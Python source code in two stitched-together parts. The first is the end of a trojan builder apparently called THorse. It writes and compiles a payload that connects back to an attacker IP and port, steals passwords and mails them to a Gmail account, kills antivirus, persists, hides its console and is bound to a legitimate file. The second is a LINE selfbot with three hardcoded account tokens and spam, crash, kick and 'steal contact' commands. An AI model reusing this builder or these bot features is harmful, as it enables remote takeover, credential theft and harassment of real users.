file.write("\t\tprint(\"[+] Disabling THorse: Already Running\")\n")
file.write("\telse:\n") # if no instance running, going to run THorse
if arguments.stealer:
file.write(f"\t\tt2 = threading.Thread(target=steal)\n") #Making Stealer Thread
file.write(f"\t\tt2.start()\n\n") #Starting Thread
file.write(f"\t\ttHorse = payload.MainPayload(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
if arguments.kill_av != None and arguments.kill_av != "":
file.write(f"\t\ttHorse.kill_av({arguments.kill_av})\n")
else:
file.write("\t\ttHorse.kill_av()\n")
file.write(f"\t\ttHorse.become_persistent({time_persistent})\n")
file.write("\t\ttHorse.start()\n\n")
file.write("check_and_start()\n")
def create_trojan_linux(file_name, email, password, ip, port, time_persistent):
with open(file_name, "w+") as file:
file.write("import payload\n")
file.write(f"tHorse = payload.MainPayload(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
file.write(f"tHorse.become_persistent({time_persistent})\n")
file.write("tHorse.start()\n\n")
def obfuscating_payload(file_name):
gen = DocumentGenerator()
text = "#" + gen.sentence()
with open(file_name, "a") as file:
file.write(text)
def compile_for_windows(file_name):
if arguments.debug:
if arguments.bind != None and arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.bind != None:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
else:
if arguments.bind != None and arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.bind != None:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def compile_for_linux(file_name):
if arguments.debug:
subprocess.call(f"pyinstaller --onefile --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"pyinstaller --onefile --noconsole --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def del_junk_file(file_name):
try:
if platform.system() == 'Windows':
build = os.getcwd() + "\\build"
file_name = os.getcwd() + f"\\{file_name}"
pycache = os.getcwd() + "\\__pycache__"
os.remove(file_name)
os.remove(file_name + ".spec")
shutil.rmtree(build)
shutil.rmtree(pycache)
if platform.system() == 'Linux':
file_spec = file_name + ".spec"
os.system(f"rm -r build/ __pycache__/ {file_spec} {file_name}")
except Exception:
pass
def exit_greet():
try:
os.system('cls')
except Exception as e:
os.system('clear')
del_junk_file(arguments.output)
print(Fore.GREEN + '''Happy Hacking ~THorse!\n''' + Style.RESET_ALL)
quit()
if __name__ == '__main__':
if Attacker_System == 'Windows':
try:
shutil.rmtree(os.getcwd() + "\\dist")
except Exception:
pass
else:
try:
os.system('rm -Rf dist')
except Exception:
pass
try:
print(banners.get_banner())
print(f"\t\t{Fore.YELLOW}Author: {Fore.GREEN}Pushpender | {Fore.YELLOW}GitHub: {Fore.GREEN}@PushpenderIndia\n")
arguments = get_options()
if arguments.icon == None:
arguments.icon = input(f'{Fore.RED}[!] Please Specify Icon Path {Fore.WHITE}[{Fore.GREEN}LEAVE BLANK to SET icon/exe.ico as icon{Fore.WHITE}] : ')
if arguments.icon == "":
arguments.icon = "icon/exe.ico"
if not os.path.exists(PYTHON_PYINSTALLER_PATH.replace("wine ", "")) and arguments.windows:
PYTHON_PYINSTALLER_PATH = get_python_pyinstaller_path()
if PYTHON_PYINSTALLER_PATH == "UnableToFind":
print(f'{Fore.RED}[!] Default Pyinstaller Path inside Wine Directory is Incorrect')
print(f'{Fore.RED}[!] {Fore.WHITE}[Please Update Line 19 Later] [{Fore.RED}DefautPath: {Fore.WHITE}~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe]')
PYTHON_PYINSTALLER_PATH = "wine "
PYTHON_PYINSTALLER_PATH += input(f'\n{Fore.WHITE}[?] Enter pyinstaller.exe path manually : ')
print(f'\n{Fore.GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]{Fore.GREEN}')
print(f'\n {Fore.YELLOW}Email:{Fore.RED} ' + arguments.email)
print(f' {Fore.YELLOW}Password:{Fore.RED} ' + arguments.password)
print(f' {Fore.YELLOW}IP Address:{Fore.RED} ' + arguments.ip)
print(f' {Fore.YELLOW}Port:{Fore.RED} ' + arguments.port)
print(f' {Fore.YELLOW}Output Evil File Name:{Fore.RED} ' + arguments.output)
print(f' {Fore.YELLOW}Becoming Persistence After:{Fore.RED} ' + str(arguments.time_persistent) + f'{Fore.YELLOW} seconds')
print(f' {Fore.YELLOW}Icon Path:{Fore.RED} ' + arguments.icon)
print(f' {Fore.YELLOW}Pyinstaller Path:{Fore.RED} ' + PYTHON_PYINSTALLER_PATH + f" {Fore.YELLOW}[{Fore.WHITE}Manually Update line: 15 & 19, If this PATH is Incorrect{Fore.YELLOW}]")
if arguments.bind != None:
print(f' {Fore.YELLOW}Binding To [{Fore.RED}Legitimate File Path{Fore.YELLOW}]:{Fore.RED} ' + str(arguments.bind))
print(f'\n{Fore.GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
ask = input(f'\n{Fore.WHITE}[?] These info above are correct? (y/n) : ')
if ask.lower() == 'y':
pass
else:
arguments.email = input('\n[?] Type your gmail to receive logs: ')
arguments.password = input('[?] Type your gmail password: ')
arguments.ip = input('[?] LHOST or IP Address: ')
arguments.port = int(input('[?] LPORT: '))
arguments.time_persistent = int(input('[?] Time After which it should become persistence; [In Seconds]: '))
arguments.output = input('[?] Output Evil File Name: ')
arguments.icon = input(f'[?] Icon Path [{Fore.RED}If Present In This Directory, then just type Name{Fore.WHITE}]: ')
if arguments.bind != None:
arguments.bind = input(f'[?] Path of Legitimate File [{Fore.RED}.exe is Recommended{Fore.WHITE}]: ')
check_dependencies()
print(f"\n{Fore.YELLOW}[*] Generating Please wait for a while...{Fore.MAGENTA}\n")
if Attacker_System == 'Linux':
if arguments.linux:
create_trojan_linux(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent)
if Attacker_System == 'Windows' and arguments.linux:
print(f"{Fore.RED}[!] Linux payload can't be compiled from windows machine")
print(f"{Fore.YELLOW}[*] Making Payload for Windows ...\n")
if arguments.windows:
create_trojan(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent, arguments.bind)
obfuscating_payload(arguments.output)
encrypting_code = encrypt_code.Encrypt()
encrypting_code.encrypt(arguments.output)
print(f"{Fore.YELLOW}[*] Compiling your payload, Please Wait for a while...")
print(f"{Fore.MAGENTA}")
if arguments.windows:
compile_for_windows(arguments.output)
elif arguments.linux:
compile_for_linux(arguments.output)
else:
print(f"{Fore.RED}[!] Please Specify {Fore.YELLOW}-w{Fore.RED} for {Fore.GREEN}WINDOWS{Fore.RED} or {Fore.YELLOW}-l{Fore.RED} for {Fore.GREEN}LINUX{Fore.RED} payload generation")
print(f"\n{Fore.YELLOW}[*] Deleting Junk Files...")
del_junk_file(arguments.output)
print(f"{Fore.GREEN}[+] Junk Files Removed Successfully!")
if os.path.exists(f'dist/{arguments.output}.exe') or os.path.exists(f'dist/{arguments.output}'):
print(f"\n{Fore.GREEN}[+] Generated Successfully!\n")
print(f"\n\n{Fore.RED}[***] Don't forget to allow less secure applications in your Gmail account.")
print(f"{Fore.GREEN}Use the following link to do so https://myaccount.google.com/lesssecureapps")
print(f"\n{Fore.RED} :O-) TIP{Fore.YELLOW} : USE ICONS from {Fore.RED}icon{Fore.YELLOW} folder like this >> {Fore.RED}--icon icon/exe.ico")
else:
print(f"\n{Fore.RED}[!] Failed To Generate Your Payload :(, Please Try Again!\n")
print(f"\n{Fore.GREEN}[:D] Please Contact us on https://github.com/PushpenderIndia/thorse\n")
except KeyboardInterrupt:
exit_greet()
|
sbwib1.py
|
# -*- coding: utf-8 -*-
import WIB
from WIB.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
import requests
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
kr1 = WIB.LINE()
kr1.login(token="EpozTCA86zkFsWQZ5eZb.Fg2xAK8+c6My92znQ5+akW.RjjUWkkHKma2WGkYtbnlLXWN8L3uTDBnI8rmH0wSpoA=")#1 => akun utama
kr1.loginResult()
kr2 = WIB.LINE()
kr2.login(token="Ep3KDaVSZdCgAk4V1VH6.xuC8K6+gzJsmen91eTrSPG.blTStQRf9wqptb2xs0DbqiVD4HMbvcv04Ny3sSiQIr0=")#2 => asist
kr2.loginResult()
kr3 = WIB.LINE()
kr3.login(token="Epg051T3CRWANqSrI394.CKP6GP5GmFyfYuKxouLRXa.ucpPBtY68YHrifaA4MsKXRryYT3N/XnI6ijXgoRZU2E=")#3 => asist
kr3.loginResult()
print "╔═════════════════════════\n╔════════════════════════\n╠❂➣ SUKSES LOGIN WIB\n╚════════════════════════\n╚═════════════════════════"
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̷̝̝͖̙͚͙͕̼̰͓̊̉̈̒͗̈́ ☜☆
╠═════════════════
╠[➣ Oswib1
╠[➣ Oswib2
╠[➣ Oswib3
╠[➣ Oswib4
╠[➣ Cipok
╠[➣ Gcreator
╠[➣ Idline (text)
╠[➣ Time
╠[➣ Salam1/Salam2
╠[➣ Creator
╠[➣ Kelahiran
╠[➣ Kalender/waktu
╠[➣ Say
╠[➣ Gift8
╠[➣ Gift/Gift1/2/3
╠[➣ Reinvite
╠[➣ Time
╠[➣ Kapan
╠[➣ Apakah
╠[➣ Facebook
╠[➣ Youtube
╠[➣ Yt
╠[➣ Music
╠[➣ Google (text)
╠[➣ Playstore (text)
╠[➣ Instagram (username)
╠[➣ Wikipedia (text)
╠[➣ Image (text)
╠[➣ Lirik (text)
╠[➣ Say-id
╠[➣ Say-en
╠[➣ Say-jp
╠[➣ Say-ar
╠[➣ Say-ko
╠[➣ Welcome
╠[➣ Nah
╠[➣ Absen
╠[➣ Runtime
╠[➣ Speed
╠[➣ Intip on/off
╚════════════
"""
helpself ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̷̝̝͖̙͚͙͕̼̰͓̊̉̈̒͗̈́2̜̪̠̦̠̭̥̬̉̆̀͗͒̂͗̊̚͞ ☜☆
╠═════════════════
╠[➣ Cctv on/off
╠[➣ Intip/Ciduk
╠[➣ Setimage: (link)
╠[➣ Papimage
╠[➣ Setvideo: (link)
╠[➣ Papvideo
╠[➣ mymid
╠[➣ Getcover @
╠[➣ Myname
╠[➣ Mybot
╠[➣ Mybio
╠[➣ Mypict
╠[➣ Myvid
╠[➣ Urlpict
╠[➣ Mycover
╠[➣ Urlcover
╠[➣ Getmid @
╠[➣ Getinfo @
╠[➣ Getbio @
╠[➣ Getname @
╠[➣ Getprofile @
╠[➣ Getcontact @
╠[➣ Getpict @
╠[➣ Getvid @
╠[➣ Picturl @
╠[➣ Getcover @
╠[➣ Coverurl @
╠[➣ Mycopy @
╠[➣ Mybackup
╠[➣ Testext: (text)
╠[➣ Spam change:
╠[➣ Spam add:
╠[➣ Spam:
╠[➣ Spam (text)
╠[➣ Steal contact
╠[➣ Auto add
╠[➣ Spam change:
╠[➣ Spam add:
╠[➣ Spam:
╠[➣ Spam txt/on/jml
╠[➣ Micadd @
╠[➣ Micdel @
╠[➣ Miclist
╠[➣ Mimic target @
╠[➣ Mimic on/off
╚════════════
"""
helpset ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̷̝̝͖̙͚͙͕̼̰͓̊̉̈̒͗̈́3̶̖̲̥̠̘̉͋̒̀̉͒̍̀͢͢͟͜͜͠͠☜☆
╠═════════════════
╠[➣ Gurl
╠[➣ Grup cancel:
╠[➣ Share on/off
╠[➣ Poto on/off
╠[➣ Sambut on/off
╠[➣ Pergi on/off
╠[➣ Tag on/off
╠[➣ Tag2 on/off
╠[➣ Contact on/off
╠[➣ Autojoin on/off
╠[➣ Autoleave on/off
╠[➣ Autoadd on/off
╠[➣ Like friend
╠[➣ Like me
╠[➣ Link on/off
╠[➣ Simisimi on/off
╠[➣ Autoread on/off
╠[➣ Update
╠[➣ Pesan set:
╠[➣ Coment Set:
╠[➣ Comment on/off
╠[➣ Comment
╠[➣ Com hapus Bl
╠[➣ Com Bl cek
╠[➣ Jam on/off
╠[➣ Jam say:
╚════════════
"""
helpgrup ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̝̝͖̙͚͙͕̼̰̜̪̠̦̠̭̥̬̊̉̈̒͗̈́̉̆̀͗͒̂͗̊̚͞4̧̳͙̰̼̫̟́̃̄͋̊͘͢ ☜☆
╠═════════════════
╠[➣ Mode on/off
╠[➣ Protect on/off
╠[➣ Qr on/off
╠[➣ Invite on/off
╠[➣ Cancel on/off
╠[➣ Link on
╠[➣ Url
╠[➣ Cancel
╠[➣ Gcreator
╠[➣ Kick @
╠[➣ Cium @
╠[➣ Gname:
╠[➣ Gbroadcast:
╠[➣ Cbroadcast:
╠[➣ Infogrup
╠[➣ Gruplist
╠[➣ Friendlist
╠[➣ Blacklist
╠[➣ Ban @
╠[➣ Unban @
╠[➣ Clearban
╠[➣ Banlist
╠[➣ Contact ban
╠[➣ Midban
╠[➣ Kick @
╠[➣ Cium @
╠[➣ Cancel
╠[➣ Friendpp:
╠[➣ Checkmid:
╠[➣ Checkid:
╠[➣ Friendlist
╠[➣ Memlist
╠[➣ Friendinfo:
╠[➣ Friendpict:
╠[➣ Friendlistmid
╠[➣ Blocklist
╠[➣ Gruplist
╠[➣ Gruplistmid
╠[➣ Grupimage:
╠[➣ Grupname
╠[➣ Grupid
╠[➣ Grupinfo:
╠[➣ Gcreator
╠[➣ Invite:gcreator
╠[➣ Gname:
╠[➣ Infogrup
╠[➣ Grup id
╠[➣ Glist
╠[➣ Gcancel
╠[➣ Asup
╠[➣ Bye
╠[➣ Ats
╠[➣ Cctv on/off
╠[➣ Ciduk/Intip
╠[➣ Gbroadcast:
╠[➣ Cbroadcast:
╠[➣ Getgrup image
╠[➣ Urlgrup image
╠[➣ Status
╠[➣ Ban @
╠[➣ Unban @
╠[➣ Ban:
╠[➣ Unban:
╠[➣ Clear
╠[➣ Ban:on
╠[➣ Unban:on
╠[➣ Banlist
╠[➣ Conban/Contact ban
╠[➣ Midban
╠[➣ Scan blacklist
╠[➣ Bcast
╚════════════
"""
helprhs ="""
╔═════════════════
║☆☞ Č̪͙̬̤͕̲͍̽̊̂̂̑O̸̢̲̪͍͓͕̻̹͂͗̋͐͊̿͟M̨̛̩͔͚̠͖͐̉͑͛͟͜M̻͈͙̹͍̜̎̽͑͌̌̂͢͞͡Ȧ̶͔̖͕͈͓̲͙̻̎́̂̎͡N̵̨̩̞̫̙̺̼͈͌̽͒̑̈́͢͡͞͝D̝̝͖̙͚͙͕̼̰̜̪̠̦̠̭̥̬̊̉̈̒͗̈́̉̆̀͗͒̂͗̊̚͞5̶̧͖̖̰͕̗̳͙̰̼̫̟̏̃̾͐̓̑̾́̃̄͋̊̚̕͘͢͞ ☜☆
╠═════════════════
╠[➣ Byebye
╠[➣ Ifconfig
╠[➣ System
╠[➣ Kernel
╠[➣ Cpu
╠[➣ Restart
╠[➣ Turn off
╠[➣ Speed
╠[➣ Crash
╠[➣ Crash kontak @
╠[➣ Attack
╠[➣ Spamcontact @
╠[➣ Spamtag @
╠[➣ Pulang
╠[➣ Wib/cab1/2
╠[➣ Logo
╠[➣ Restart
╠[➣ Invite/Undang/Jepit
╠[➣ Namebot:(txt)
╠[➣ Namebot1/2/3/4/5:
╠[➣ Biobot: (txt)
╠[➣ Gcreator:inv
╠[➣ Gcreator:kick
╠[➣ Spamtag @
╠[➣ Cium
╠[➣ Glist
╠[➣ Glist2
╠[➣ Asupka
╠[➣ Bye
╠[➣ Megs
╠[➣ !megs
╠[➣ Recover
╠[➣ Spin
╠[➣ Removechat
╠[➣ Muach
╠[➣ Salam3
╚════════════
"""
KAC=[kr1,kr2,kr3]
mid = kr1.getProfile().mid
Amid = kr2.getProfile().mid
Bmid = kr3.getProfile().mid
midd1=[""]
midd2=[""]
midd3=[""]
Bots=[mid,Amid,Bmid]
owner=["u0710a42a75e0a476ad687639db8c069c"]
admin=["u0710a42a75e0a476ad687639db8c069c",mid,Amid,Bmid]
wait = {
'likeOn':False,
'detectMention':True,
'potoMention':False,
'kickMention':False,
'steal':False,
'stiker':False,
'pap':{},
'invite':{},
'invite2':{},
'spam':{},
'contact':False,
'autoJoin':False,
'autoCancel':{"on":False,"members":5},
'leaveRoom':False,
'timeline':False,
'autoAdd':False,
'message':"""""",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By Strangler\n »»» http://line.me/ti/p/~nesawiraguna «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cNames1":"",
"cNames2":"",
"cNames3":"",
"Wc":False,
"Wc2":False,
"Lv":False,
"autoKick":False,
"winvite":False,
"MENTION":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"QrProtect":False,#<====
"MProtection":False,
"Protectguest":False,
"Protectcancel":False,
"Protectgr":False,
"Sider":{},
"intipp":{},
"pname":{},
"pro_name":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
ngintip = {
"intip":{},
"target":{},
"toong":{}
}
setTime = {}
setTime = wait2['setTime']
contact = kr1.getProfile()
mybackup = kr1.getProfile()
contact = kr2.getProfile()
mybackup = kr2.getProfile()
contact = kr3.getProfile()
mybackup = kr3.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = kr1.getProfile()
backup = kr1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kr1.getProfile()
profile = kr1.getProfile()
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
mulai = time.time()
url123 = ("https://scontent.fcgk2-1.fna.fbcdn.net/v/t1.0-9/26229822_136061360519754_2383391381158562768_n.jpg?oh=5b629e008c344ab9120798423a1fe9fe&oe=5ABEC25F")
agent = {'User-Agent' : "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"}
def translate(to_translate, to_language="auto", language="auto"):
bahasa_awal = "auto"
bahasa_tujuan = to_language
kata = to_translate
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
return result
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
#def autolike():
# for zx in range(0,100):
# hasil = kr1.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea ««")
# print "DiLike"
# except:
# pass
# else:
# print "Sudah DiLike"
# time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
#def autolike():
# for zx in range(0,100):
# hasil = kr1.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# kr1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# kr1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea ««")
# print "Like"
# except:
# pass
# else:
# print "Already Liked"
#time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = kr1.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self.Talk.kr1.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = kr1.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n9§9" + Name
wait2['ROM'][op.param1][op.param2] = "9§9" + Name
else:
pass
except:
pass
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M_id = self.Talk.kr1.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
print r
if r.status_code != 201:
raise Exception('Upload audio failure.')
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise e
def sendAudioWithURL(self, to_, url):
path = 'pythonLiness.data'
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download Audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise e
def sendVoice(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentPreview = None
M_id = self._kr1.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'voice_message',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload voice failure.')
return True
def sendVideoWithURL(self, to_, url):
path = 'pythonLines.data'
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download Audio failure.')
try:
self.sendVideo(to_, path)
except Exception as e:
raise e
def mention(to,nama):
aa = ""
bb = ""
strt = int(12)
akh = int(12)
nm = nama
#print nm
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "► @c \n"
